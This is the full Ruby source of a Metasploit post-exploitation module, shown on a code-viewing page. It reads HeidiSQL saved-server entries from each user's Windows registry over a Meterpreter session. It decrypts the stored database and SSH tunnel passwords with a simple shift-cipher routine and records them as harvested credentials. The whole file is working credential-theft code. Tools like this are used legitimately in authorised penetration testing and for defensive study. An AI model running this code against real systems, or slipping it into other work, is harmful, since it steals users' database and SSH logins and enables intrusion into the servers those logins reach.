Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Post
7
  include Msf::Post::Windows::Registry
8
  include Msf::Auxiliary::Report
9
  include Msf::Post::Windows::UserProfiles
10

11
  def initialize(info = {})
12
    super(
13
      update_info(
14
        info,
15
        'Name' => 'Windows Gather HeidiSQL Saved Password Extraction',
16
        'Description' => %q{
17
          This module extracts saved passwords from the HeidiSQL client. These
18
          passwords are stored in the registry. They are encrypted with a custom algorithm.
19
          This module extracts and decrypts these passwords.
20
        },
21
        'License' => MSF_LICENSE,
22
        'Author' => ['h0ng10'],
23
        'Platform' => [ 'win' ],
24
        'SessionTypes' => [ 'meterpreter' ]
25
      )
26
    )
27
  end
28

29
  def print_status(msg = '')
30
    super("#{peer} - #{msg}")
31
  end
32

33
  def print_error(msg = '')
34
    super("#{peer} - #{msg}")
35
  end
36

37
  def print_good(msg = '')
38
    super("#{peer} - #{msg}")
39
  end
40

41
  def run
42
    userhives = load_missing_hives
43
    userhives.each do |hive|
44
      next if hive['HKU'].nil?
45

46
      print_status("Looking at Key #{hive['HKU']}")
47
      begin
48
        subkeys = registry_enumkeys("#{hive['HKU']}\\Software\\HeidiSQL\\Servers")
49
        if subkeys.blank?
50
          print_status('HeidiSQL not installed for this user.')
51
          next
52
        end
53

54
        service_types = {
55
          0 => 'mysql',
56
          1 => 'mysql-named-pipe',
57
          2 => 'mysql-ssh',
58
          3 => 'mssql-named-pipe',
59
          4 => 'mssql',
60
          5 => 'mssql-spx-ipx',
61
          6 => 'mssql-banyan-vines',
62
          7 => 'mssql-windows-rpc',
63
          8 => 'postgres'
64
        }
65

66
        subkeys.each do |site|
67
          site_key = "#{hive['HKU']}\\Software\\HeidiSQL\\Servers\\#{site}"
68
          host = registry_getvaldata(site_key, 'Host') || ''
69
          user = registry_getvaldata(site_key, 'User') || ''
70
          port = registry_getvaldata(site_key, 'Port') || ''
71
          db_type = registry_getvaldata(site_key, 'NetType') || ''
72
          prompt = registry_getvaldata(site_key, 'LoginPrompt') || ''
73
          ssh_user = registry_getvaldata(site_key, 'SSHtunnelUser') || ''
74
          ssh_host = registry_getvaldata(site_key, 'SSHtunnelHost') || ''
75
          ssh_port = registry_getvaldata(site_key, 'SSHtunnelPort') || ''
76
          ssh_pass = registry_getvaldata(site_key, 'SSHtunnelPass') || ''
77
          win_auth = registry_getvaldata(site_key, 'WindowsAuth') || ''
78
          epass = registry_getvaldata(site_key, 'Password')
79

80
          # skip if windows authentication is used (mssql only)
81
          next if db_type.between?(3, 7) && (win_auth == 1)
82
          next if epass.nil? || (epass == '') || (epass.length == 1) || (prompt == 1)
83

84
          pass = decrypt(epass)
85
          print_good("Service: #{service_types[db_type]} Host: #{host} Port: #{port} User: #{user}  Password: #{pass}")
86

87
          service_data = {
88
            address: host == '127.0.0.1' ? rhost : host,
89
            port: port,
90
            service_name: service_types[db_type],
91
            protocol: 'tcp',
92
            workspace_id: myworkspace_id
93
          }
94

95
          credential_data = {
96
            origin_type: :session,
97
            session_id: session_db_id,
98
            post_reference_name: refname,
99
            private_type: :password,
100
            private_data: pass,
101
            username: user
102
          }
103

104
          credential_data.merge!(service_data)
105

106
          # Create the Metasploit::Credential::Core object
107
          credential_core = create_credential(credential_data)
108

109
          # Assemble the options hash for creating the Metasploit::Credential::Login object
110
          login_data = {
111
            core: credential_core,
112
            status: Metasploit::Model::Login::Status::UNTRIED
113
          }
114

115
          # Merge in the service data and create our Login
116
          login_data.merge!(service_data)
117
          login = create_credential_login(login_data)
118

119
          # if we have a MySQL via SSH connection, we need to store the SSH credentials as well
120
          next unless db_type == 2
121

122
          print_good("Service: ssh Host: #{ssh_host} Port: #{ssh_port} User: #{ssh_user}  Password: #{ssh_pass}")
123

124
          service_data = {
125
            address: ssh_host,
126
            port: ssh_port,
127
            service_name: 'ssh',
128
            protocol: 'tcp',
129
            workspace_id: myworkspace_id
130
          }
131

132
          credential_data = {
133
            origin_type: :session,
134
            session_id: session_db_id,
135
            post_reference_name: refname,
136
            private_type: :password,
137
            private_data: ssh_pass,
138
            username: ssh_user
139
          }
140

141
          credential_data.merge!(service_data)
142

143
          # Create the Metasploit::Credential::Core object
144
          credential_core = create_credential(credential_data)
145

146
          # Assemble the options hash for creating the Metasploit::Credential::Login object
147
          login_data = {
148
            core: credential_core,
149
            status: Metasploit::Model::Login::Status::UNTRIED
150
          }
151

152
          # Merge in the service data and create our Login
153
          login_data.merge!(service_data)
154
          login = create_credential_login(login_data)
155
        end
156
      rescue ::Rex::Post::Meterpreter::RequestError => e
157
        elog(e)
158
        print_error("Cannot Access User SID: #{hive['HKU']} : #{e.message}")
159
      end
160
    end
161
    unload_our_hives(userhives)
162
  end
163

164
  def decrypt(encoded)
165
    decoded = ''
166
    shift = Integer(encoded[-1, 1])
167
    encoded = encoded[0, encoded.length - 1]
168

169
    hex_chars = encoded.scan(/../)
170
    hex_chars.each do |entry|
171
      x = entry.to_i(16) - shift
172
      decoded += x.chr(::Encoding::UTF_8)
173
    end
174

175
    return decoded
176
  end
177
end
178

179